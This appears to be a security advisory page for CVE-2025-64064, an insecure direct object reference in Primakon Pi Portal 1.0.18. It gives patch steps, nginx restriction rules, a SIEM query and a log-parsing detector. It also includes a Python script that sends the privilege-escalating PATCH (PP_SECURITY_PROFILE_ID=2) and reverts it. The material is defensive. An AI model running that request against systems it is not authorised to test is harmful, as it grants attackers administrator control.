CVE-2025-64064
📋 TL;DR
Primakon Pi Portal 1.0.18 has an insecure direct object reference vulnerability in its /api/v2/pp_users endpoint that allows any authenticated user to escalate privileges to administrator. This affects all organizations using Primakon Pi Portal 1.0.18 with default configurations. Attackers can gain full administrative control over the system.
💻 Affected Systems
- Primakon Pi Portal 1.0.18 (earlier releases are not confirmed affected by this page; fixed in 1.0.19)
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise where attackers gain administrative access, modify all user permissions, access sensitive data, and potentially pivot to other systems.
Likely Case
Privilege escalation leading to unauthorized administrative access, data exfiltration, and configuration changes.
If Mitigated
Limited impact if the fix is applied or PATCH access to the endpoint is restricted at the proxy. Network segmentation alone does not stop an already-authenticated user; its value is in reducing who can reach the portal at all, while monitoring makes the escalation attempt visible.
🎯 Exploit Status
Exploitation requires an authenticated account, but no elevated privilege: a single HTTP PATCH request is enough. A public proof-of-concept is reported to exist in a GitHub repository.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.0.19 or later
Vendor Advisory: https://www.primakon.com/rjesenja/primakon-pcm/
Restart Required: Yes
Instructions:
1. Back up the current configuration.
2. Download and install Primakon Pi Portal version 1.0.19 or later from the vendor portal.
3. Restart the Pi Portal service.
4. Verify the fix by repeating the PATCH check described under How to Verify from a low-privilege test account.
🔧 Temporary Workarounds
API Endpoint Restriction
Block or restrict access to the vulnerable /api/v2/pp_users endpoint using web application firewall or reverse proxy rules. Blocking the endpoint outright also breaks legitimate user management, so restricting the vulnerable method to an administrative subnet is usually the more workable option.
# Example nginx location block (nginx as reverse proxy in front of Pi Portal); deny all also blocks legitimate user management
location /api/v2/pp_users {
    deny all;
}
# Alternative: leave GET open and allow PATCH and other methods only from an admin subnet (adjust 10.0.1.0/24 to your network)
location /api/v2/pp_users {
    limit_except GET { allow 10.0.1.0/24; deny all; }
}
Network Segmentation
Isolate Primakon Pi Portal from general user networks and restrict access to administrative interfaces only.
🧯 If You Can't Patch
- Implement strict network access controls to limit who can reach the Pi Portal interface
- Enable detailed logging and monitoring for privilege escalation attempts and review logs daily
🔍 How to Verify
Check if Vulnerable:
Using a low-privilege test account, send an authenticated PATCH request to the /api/v2/pp_users endpoint with PP_SECURITY_PROFILE_ID=2 in the body. If the request is accepted and the account's security profile is now the administrator profile when read back, the system is vulnerable. Revert the test account's profile afterwards.
Check Version:
Check Primakon Pi Portal web interface admin panel or configuration files for version information.
Verify Fix Applied:
Repeat the same PATCH request from the low-privilege test account after patching. It should be rejected with a permission-denied error (HTTP 403) or similar, and the account's security profile should remain unchanged.
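The check above written out as a script, added here as an example and not code from the advisory or from Primakon. It sends the PATCH from a low-privilege test account, confirms by reading the record back that the profile actually changed (a 2xx alone is not proof, since some applications silently drop fields they refuse to update), and reverts the account. Everything beyond the endpoint path and the PP_SECURITY_PROFILE_ID=2 body is an assumption: the per-user URL shape /api/v2/pp_users/<id>, a JSON body, a bearer token for authentication, a GET that returns the user record as JSON, and profile id 2 meaning administrator. The transport is injectable so the decision logic can be exercised offline with a scripted stand-in.

```python
import json
import urllib.error
import urllib.request

ENDPOINT = "/api/v2/pp_users"           # endpoint named in the advisory
PROFILE_FIELD = "PP_SECURITY_PROFILE_ID"  # parameter named in the advisory
ADMIN_PROFILE_ID = 2                    # value used in the advisory's check


def urllib_transport(method, url, headers, data):
    """Real transport: send one request and return (status, body_bytes)."""
    req = urllib.request.Request(url, data=data, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def scripted_transport(responses):
    """Offline stand-in for testing: replays a list of (status, body_bytes)
    in order and records every request it receives on .calls."""
    queue = list(responses)
    calls = []

    def transport(method, url, headers, data):
        calls.append((method, url, data))
        return queue.pop(0)

    transport.calls = calls
    return transport


def check_escalation(base_url, token, user_id, original_profile_id,
                     transport=urllib_transport):
    """Return 'vulnerable', 'patched' or 'inconclusive'.

    Assumptions (not from the advisory): per-user URL, JSON body, bearer auth,
    and a GET that returns the record with PROFILE_FIELD set.
    On a vulnerable host the test account is reverted before returning.
    """
    url = f"{base_url}{ENDPOINT}/{user_id}"
    headers = {"Authorization": f"Bearer {token}",
               "Content-Type": "application/json"}
    body = json.dumps({PROFILE_FIELD: ADMIN_PROFILE_ID}).encode()

    status, _ = transport("PATCH", url, headers, body)
    if status in (401, 403, 405):
        return "patched"
    if status // 100 != 2:
        return "inconclusive"

    # The PATCH was accepted; only a changed profile on read-back proves escalation.
    status, raw = transport("GET", url, headers, None)
    try:
        parsed = json.loads(raw or b"{}")
    except ValueError:
        return "inconclusive"
    current = parsed.get(PROFILE_FIELD) if isinstance(parsed, dict) else None
    if status == 200 and current == ADMIN_PROFILE_ID:
        revert = json.dumps({PROFILE_FIELD: original_profile_id}).encode()
        transport("PATCH", url, headers, revert)
        return "vulnerable"
    return "inconclusive"


if __name__ == "__main__":
    # Offline demonstration: a scripted host that accepts the PATCH and then
    # reflects the administrator profile on read-back.
    t = scripted_transport([(200, b"{}"),
                            (200, b'{"PP_SECURITY_PROFILE_ID": 2}'),
                            (200, b"{}")])
    print(check_escalation("https://portal.example", "token", 42, 5, transport=t))
```

Run it only against a test account you control: on a vulnerable host that account is an administrator for the moment between the PATCH and the revert, which is exactly the window an attacker would use.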
📡 Detection & Monitoring
Log Indicators:
- HTTP PATCH requests to /api/v2/pp_users endpoint
- User privilege changes in audit logs
- Multiple failed authentication attempts followed by successful PATCH
Network Indicators:
- PATCH requests to /api/v2/pp_users with PP_SECURITY_PROFILE_ID parameter
- Unusual traffic patterns from low-privilege users
SIEM Query:
source="primakon" AND (url="/api/v2/pp_users" AND method="PATCH")
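The indicators above as runnable detection logic, added here as an example rather than the page's own query. It parses reverse-proxy access-log lines in combined format, raises one alert per PATCH to /api/v2/pp_users (prefix match, so per-user paths are covered), and records whether the request succeeded, how many 401 responses the same source collected beforehand, whether the same user later reached an admin path, and whether the source sits in an administrative network. The sample log lines are constructed, and the /admin path prefix, the 10.0.1.0/24 admin network and the log format are assumptions; request bodies are not in a default access log, so the PP_SECURITY_PROFILE_ID parameter itself is not visible here.

```python
import ipaddress
import re
from collections import defaultdict

ENDPOINT = "/api/v2/pp_users"   # vulnerable endpoint named in the advisory
ADMIN_PATH = "/admin"           # assumed prefix of the portal's admin UI

# Combined log format (nginx/Apache default). Request bodies are not logged,
# so the PP_SECURITY_PROFILE_ID parameter cannot be matched from these lines.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines, not real traffic: one failed login, a successful
# PATCH by a low-privilege user who then opens the admin UI, and a PATCH that
# a patched instance rejects.
SAMPLE_LOG = """\
10.0.5.17 - alice [02/Nov/2025:09:12:01 +0000] "GET /api/v2/pp_users/42 HTTP/1.1" 200 512
10.0.5.17 - alice [02/Nov/2025:09:12:09 +0000] "POST /login HTTP/1.1" 401 0
10.0.5.17 - alice [02/Nov/2025:09:12:14 +0000] "POST /login HTTP/1.1" 200 88
10.0.5.17 - alice [02/Nov/2025:09:12:20 +0000] "PATCH /api/v2/pp_users/42 HTTP/1.1" 200 512
10.0.8.3 - bob [02/Nov/2025:09:13:00 +0000] "PATCH /api/v2/pp_users/7 HTTP/1.1" 403 0
10.0.5.17 - alice [02/Nov/2025:09:15:02 +0000] "GET /admin/settings HTTP/1.1" 200 2048
"""


def parse(line):
    """Return the named fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text, admin_net="10.0.1.0/24"):
    """Return one alert dict per PATCH to the pp_users endpoint, in log order."""
    net = ipaddress.ip_network(admin_net)
    records = [r for r in map(parse, log_text.splitlines()) if r]
    failed_auth = defaultdict(int)   # 401 responses seen so far, per source IP
    alerts = []
    for i, rec in enumerate(records):
        if rec["method"] == "PATCH" and rec["path"].startswith(ENDPOINT):
            succeeded = rec["status"].startswith("2")
            try:
                from_admin_net = ipaddress.ip_address(rec["ip"]) in net
            except ValueError:
                from_admin_net = False
            # Post-escalation indicator: the same user later touches the admin UI.
            followed_by_admin = any(
                r["user"] == rec["user"] and r["path"].startswith(ADMIN_PATH)
                for r in records[i + 1:]
            )
            alerts.append({
                "ts": rec["ts"],
                "ip": rec["ip"],
                "user": rec["user"],
                "path": rec["path"],
                "status": int(rec["status"]),
                "succeeded": succeeded,
                "prior_failed_auth": failed_auth[rec["ip"]],
                "from_admin_net": from_admin_net,
                "followed_by_admin_access": followed_by_admin,
                # An accepted PATCH from outside the admin network is the
                # escalation itself; a rejected one is probing or a patched host.
                "severity": ("high" if succeeded and not from_admin_net
                             else "medium" if succeeded else "low"),
            })
        if rec["status"] == "401":
            failed_auth[rec["ip"]] += 1
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f'{a["severity"]:6} {a["ts"]} {a["ip"]} {a["user"]} {a["path"]} '
              f'status={a["status"]} prior_401={a["prior_failed_auth"]} '
              f'admin_ui_after={a["followed_by_admin_access"]}')
```

The audit-log side of the indicators (the security profile actually changing) lives in the application's own logs rather than the proxy log; pairing an alert from this script with a profile change for the same user in the Pi Portal audit trail is the confirmation that the escalation landed.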